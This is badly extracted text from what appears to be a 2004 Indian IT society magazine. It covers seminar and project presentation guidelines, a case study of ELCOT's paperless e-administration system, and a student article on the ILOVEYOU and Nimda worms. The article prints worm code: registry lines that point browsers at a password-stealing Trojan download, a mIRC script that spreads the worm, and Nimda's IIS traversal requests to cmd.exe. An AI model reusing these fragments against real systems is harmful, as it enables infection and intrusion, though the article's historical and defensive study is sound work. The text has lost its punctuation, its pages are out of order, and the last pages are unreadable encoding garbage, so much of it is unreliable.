guide should not exceed 2 and no of seminarteams under the supervision of a seminar guideshould not exceed 4 Each group (either projector seminar) must submit an abstract or synopsisof the work to be done or presentation to be madeto their respective guides sufficiently before thecommencement of project work or seminarpresentation Seminar guides must ensure thattopics of seminars are of advanced amp state-of-the-art type These topics should not be from theUniversity course curriculum but can be basedon the basics of these subjects A schedule forthe seminar presentations should be notified byHOD to all concerned in a tabular manner withthe following fields representing the columns

rapport with them by directly speaking andby using proper eye contact A keennessshould be shown to them that thispresentation is for their learning amp benefitonly

b) The Middle bit is usually longest and canhave several sections This is structured witha logical sequence Movement from one areaor topic to another is done using verbal orvisual links OHP or LCD acetates are usefulfor breaking the middle bit up into smallerchunks

c) The End of the presentation should be asummary a conclusion a logical end to whathas gone before

iii) PracticeA number of practices should be made

about the presentation in front of the mirror infront of the cat before friends amp on ones ownetc If possible the audio visual equipments likeOHP LCD etc can be tried out before the actualday of presentations During practice feed backcan be obtained from friends regarding thespeaking speed (ie whether too fast or too slow)the visual aids (whether clear or not) logicalmovement of sequence (whether correct or not)amp overall performance (whether excellent goodor poor etc)

Following hints amp tips may be followedduring practice or at the time of actualpresentation Breathe slowly it calms you down Speak audibly but dont shout Speak at normal pare not very fast not

very slow Speak clearly Be enthusiastic Avoid using jargons and colloquialisms

unless these are familiar to the audience Be aware of your gestures

Date Time Slot Group Title of Formatof topic presentation

(LCD OHP)

Guidelines for Seminar Presentation3 PS Preparation Planning amp practicei) PreparationPreparation for seminar presentation can

be effectively done if the following questions areasked to themselves by the students concerned What do I want the audience to LEARN or

DO as a result of my presentation How can I keep the audience interested Do I know my subject

Fundamental rule is that keep itstraightforwardly simple which is abbreviatedas KISS

ii) Planning-Any form of communication should have

a structure Beginning a Middle bit and anEnda) The Beginning should tell the audience

what the presenter(s) is going to tell them Itshould be positive Presenter should engagethe audiences attention and establish

OITS-2004

31

Use large fonts if LCD or OHP are beingused

Learn from watching others follow thestrength amp reject the weaknesses of otherspeakers

Use lots of figures diagrams charts ampgraphs etc

Point to the projection (screen) not thesource

Maintain the timing perfectly

Guidelines for Project Presentation(We have assumed that project guides

project teams amp topics of the projects havealready been finalized)1st Step- Write the abstracts or synopsis of theproject2nd Step- Set a realistic timeframe

Assuming 100 effectives working days ina semester the following is a sample break upDefine your problem - - - - - - - -Write a proposal - - - - - - - -- - -Develop your solution - - - - - - -Implement your solution - - - - -Present your solution - - - - - - -Submit the project report - - - - -3rd Step-

Make proper evaluation amp assessment ofperformance of the students on the basis of finalproducts (results reports and presentation) andthe process by which they were attained Thegrade is given for the entirety of the project Asample grade system may be as followsA a consistently excellent effort that attains

project goalsB a consistently good effort that attains project

goalsC an acceptable effort that at least partially

attains the project goals

D an inconsistent or unsatisfactory effort thatonly partially attains project goals

F an unsatisfactory effort that does not attainproject goals

Tips for writing project reports 1) Sketch the outline of the project2) Expand your outline3) Write your paper4) Rewrite until you get it right

A sample outline for project reports Introduction Background Design Implementation System in Action Results Future work Conclusion ReferenceBesides these the cover page design

acknowledgement topic index index for figuresamp tales etc can be added at proper locations ofthe project report

ConclusionSince projects amp seminars are indicators of

internal amp external abilities of the engineeringstudents the respective faculty guides or co-guides must motivate their students in such amanner that they do not resort to any kind offalse means for carrying out these two mostimportant activities of their student carrer

20 days

20 days

60 days

About the author Prof MN Das is currently Professoramp HOD in the Department of Computer Science ampEngineering at KIIT Deemed University After completinghis BE in Electronics amp Telecommunication branch in1987 from UCE Burla he was with ECIL Hyderabadfor few months in its computer group Then he joinedas a lecturer in the Dept of Electronic amp Tele commengineering dept of UCE Burla and continued upto1987 He completed his ME in Electronics systems ampcommunication during this period He then joined OrissaState Electronic Development Corporation (OSEDC) Ltdfor 1987 amp continued upto 2002 During that period hecompleted his PG Diploma in Management atXIMBAfter a long 16yrs inducted experience in various areashe joined KIIT Deemed University from 2002 onwards

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

